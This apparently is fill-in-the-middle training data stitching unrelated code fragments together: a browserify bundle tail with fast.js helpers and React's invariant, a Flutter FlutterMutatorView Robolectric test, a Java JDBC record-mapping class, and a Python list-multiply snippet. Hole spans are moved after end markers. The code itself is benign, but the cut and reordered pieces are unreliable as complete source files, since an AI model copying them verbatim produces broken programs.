context. */ module.exports = function bindInternal3 (func, thisContext) { return function (a, b, c) { return func.call(thisContext, a, b, c); }; }; },{}],11:[function(require,module,exports){ 'use strict'; var mapArray = require('./array/map'), mapObject = require('./object/map'); /** * # Map * * A fast `.map()` implementation. * * @param {Array|Object} subject The array or object to map over. * @param {Function} fn The mapper function. * @param {Object} thisContext The context for the mapper. * @return {Array|Object} The array or object containing the results. */ module.exports = function fastMap (subject, fn, thisContext) { if (subject instanceof Array) { return mapArray(subject, fn, thisContext); } else { return mapObject(subject, fn, thisContext); } }; },{"./array/map":8,"./object/map":15}],12:[function(require,module,exports){ 'use strict'; /** * Analogue of Object.assign(). * Copies properties from one or more source objects to * a target object. Existing keys on the target object will be overwritten. * * > Note: This differs from spec in some important ways: * > 1. Will throw if passed non-objects, including `undefined` or `null` values. * > 2. Does not support the curious Exception handling behavior, exceptions are thrown immediately. * > For more details, see: * > https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/assign * * * * @param {Object} target The target object to copy properties to. * @param {Object} source, ... The source(s) to copy properties from. * @return {Object} The updated target object. */ module.exports = function fastAssign (target) { var totalArgs = arguments.length, source, i, totalKeys, keys, key, j; for (i = 1; i < totalArgs; i++) { source = arguments[i]; keys = Object.keys(source); totalKeys = keys.length; for (j = 0; j < totalKeys; j++) { key = keys[j]; target[key] = source[key]; } } return target; }; },{}],13:[function(require,module,exports){ 'use strict'; var bindInternal3 = require('../function/bindInternal3'); /** * # For Each * * A fast object `.forEach()` implementation. * * @param {Object} subject The object to iterate over. * @param {Function} fn The visitor function. * @param {Object} thisContext The context for the visitor. */ module.exports = function fastForEachObject (subject, fn, thisContext) { var keys = Object.keys(subject), length = keys.length, iterator = thisContext !== undefined ? bindInternal3(fn, thisContext) : fn, key, i; for (i = 0; i < length; i++) { key = keys[i]; iterator(subject[key], key, subject); } }; },{"../function/bindInternal3":10}],14:[function(require,module,exports){ 'use strict'; /** * Object.keys() shim for ES3 environments. * * @param {Object} obj The object to get keys for. * @return {Array} The array of keys. */ module.exports = typeof Object.keys === "function" ? Object.keys : /* istanbul ignore next */ function fastKeys (obj) { var keys = []; for (var key in obj) { if (Object.prototype.hasOwnProperty.call(obj, key)) { keys.push(key); } } return keys; }; },{}],15:[function(require,module,exports){ 'use strict'; var bindInternal3 = require('../function/bindInternal3'); /** * # Map * * A fast object `.map()` implementation. * * @param {Object} subject The object to map over. * @param {Function} fn The mapper function. * @param {Object} thisContext The context for the mapper. * @return {Object} The new object containing the results. */ module.exports = function fastMapObject (subject, fn, thisContext) { var keys = Object.keys(subject), length = keys.length, result = {}, iterator = thisContext !== undefined ? bindInternal3(fn, thisContext) : fn, i, key; for (i = 0; i < length; i++) { key = keys[i]; result[key] = iterator(subject[key], key, subject); } return result; }; },{"../function/bindInternal3":10}],16:[function(require,module,exports){ /** * Copyright 2013-2015, Facebook, Inc. * All rights reserved. * * This source code is licensed under the BSD-style license found in the * LICENSE file in the root directory of this source tree. An additional grant * of patent rights can be found in the PATENTS file in the same directory. */ 'use strict'; /** * Use invariant() to assert state which your program assumes to be true. * * Provide sprintf-style format (only %s is supported) and arguments * to provide information about what broke and what you were * expecting. * * The invariant message will be stripped in production, but the invariant * will remain to ensure logic does not differ in production. */ var invariant = function(condition, format, a, b, c, d, e, f) { if ("production" !== 'production') { if (format === undefined) { throw new Error('invariant requires an error message argument'); } } if (!condition) { var error; if (format === undefined) { error = new Error( 'Minified exception occurred; use the non-minified dev environment ' + 'for the full error message and additional helpful warnings.' ); } else { var args = [a, b, c, d, e, f]; var argIndex = 0; error = new Error( format.replace(/%s/g, function() { return args[argIndex++]; }) ); error.name = 'Invariant Violation'; } error.framesToPop = 1; // we don't care about invariant's own frame throw error; } }; module.exports = invariant; },{}]},{},[6])(6) });<|fim▁end|>
parentContext = parentContext || _ExecutionContext2.default.getCurrentContext(); (0, _invariant2.default)(parentContext, 'getFragment(...): must be invoked within some context'); var childContext = parentContext.createChildContext();
<|file_name|>FlutterMutatorViewTest.java<|end_file_name|><|fim▁begin|>package io.flutter.embedding.engine.mutatorsstack; import static junit.framework.TestCase.*; import static org.mockito.Mockito.*; import android.graphics.Matrix; import android.view.MotionEvent; import io.flutter.embedding.android.AndroidTouchProcessor; import org.junit.Test; import org.junit.runner.RunWith; import org.mockito.ArgumentCaptor; import org.robolectric.RobolectricTestRunner; import org.robolectric.RuntimeEnvironment; import org.robolectric.annotation.Config; @Config(manifest = Config.NONE) @RunWith(RobolectricTestRunner.class) public class FlutterMutatorViewTest { @Test public void canDragViews() { final AndroidTouchProcessor touchProcessor = mock(AndroidTouchProcessor.class); final FlutterMutatorView view = new FlutterMutatorView(RuntimeEnvironment.systemContext, 1.0f, touchProcessor); final FlutterMutatorsStack mutatorStack = mock(FlutterMutatorsStack.class); assertTrue(view.onInterceptTouchEvent(mock(MotionEvent.class))); { view.readyToDisplay(mutatorStack, /*left=*/ 1, /*top=*/ 2, /*width=*/ 0, /*height=*/ 0); view.onTouchEvent(MotionEvent.obtain(0, 0, MotionEvent.ACTION_DOWN, 0.0f, 0.0f, 0)); final ArgumentCaptor<Matrix> matrixCaptor = ArgumentCaptor.forClass(Matrix.class); verify(touchProcessor).onTouchEvent(any(), matrixCaptor.capture()); final Matrix screenMatrix = new Matrix(); screenMatrix.postTranslate(1, 2); assertTrue(matrixCaptor.getValue().equals(screenMatrix)); } reset(touchProcessor); { view.readyToDisplay(mutatorStack, /*left=*/ 3, /*top=*/ 4, /*width=*/ 0, /*height=*/ 0); view.onTouchEvent(MotionEvent.obtain(0, 0, MotionEvent.ACTION_MOVE, 0.0f, 0.0f, 0)); final ArgumentCaptor<Matrix> matrixCaptor = ArgumentCaptor.forClass(Matrix.class); verify(touchProcessor).onTouchEvent(any(), matrixCaptor.capture()); final Matrix screenMatrix = new Matrix(); screenMatrix.postTranslate(1, 2); assertTrue(matrixCaptor.getValue().equals(screenMatrix)); } reset(touchProcessor); { view.readyToDisplay(mutatorStack, /*left=*/ 5, /*top=*/ 6, /*width=*/ 0, /*height=*/ 0); view.onTouchEvent(MotionEvent.obtain(0, 0, MotionEvent.ACTION_MOVE, 0.0f, 0.0f, 0)); final ArgumentCaptor<Matrix> matrixCaptor = ArgumentCaptor.forClass(Matrix.class); verify(touchProcessor).onTouchEvent(any(), matrixCaptor.capture()); final Matrix screenMatrix = new Matrix(); screenMatrix.postTranslate(3, 4); assertTrue(matrixCaptor.getValue().equals(screenMatrix)); } reset(touchProcessor); { view.readyToDisplay(mutatorStack, /*left=*/ 7, /*top=*/ 8, /*width=*/ 0, /*height=*/ 0); view.onTouchEvent(MotionEvent.obtain(0, 0, MotionEvent.ACTION_DOWN, 0.0f, 0.0f, 0)); final ArgumentCaptor<Matrix> matrixCaptor = ArgumentCaptor.forClass(Matrix.class); verify(touchProcessor).onTouchEvent(any(), matrixCaptor.capture());<|fim▁hole|> final Matrix screenMatrix = new Matrix(); screenMatrix.postTranslate(7, 8); assertTrue(matrixCaptor.getValue().equals(screenMatrix)); } } }<|fim▁end|>
<|file_name|>RecordHandlerImpl.java<|end_file_name|><|fim▁begin|>package fw.db.connection.impl; import fw.common.util.CE; import fw.common.util.LE; import fw.db.connection.DBException; import fw.db.connection.RecordHandler; import java.sql.ResultSet; import java.sql.ResultSetMetaData; /** * 通用的EntityBean查询映射处理类<br/> * NOTE: 给定的Entity必须符合STREET规定的命名规则 * @author dzb * * @param <T> */ class RecordHandlerImpl<T> implements RecordHandler<T> { private final CE<T> ce; //private String[] propNames = nul public RecordHandlerImpl(Class<T> classOfT) { ce = CE.of(classOfT);<|fim▁hole|> } public T mapping(ResultSet rs, int row) throws DBException { try { ResultSetMetaData rsm = rs.getMetaData(); String[] columnNames = new String[rsm.getColumnCount()]; for (int i=0; i<rsm.getColumnCount(); i++){ columnNames[i] = rsm.getColumnName(i+1).toLowerCase(); } T bean = ce.create(); for (String cn : columnNames) { Object v = rs.getObject(cn); String fn = DBUtils.convColumnNameToPropertyName(cn); // TODO think about the comment block check logic // Field field = ce.getField(fn); // v = LE.coerce(v, field.getType()); LE.setPropertyValue(bean, fn, v); } return bean; } catch (Throwable e) { throw new DBException(e); } } }<|fim▁end|>
//propNames =LE.getPropertyNames(classOfT);
<|file_name|>multiply_list_by_integer_with_restrictions.py<|end_file_name|><|fim▁begin|>from operator import mul<|fim▁hole|><|fim▁end|>
def multiply(n, l): return map(lambda a: mul(a, n), l)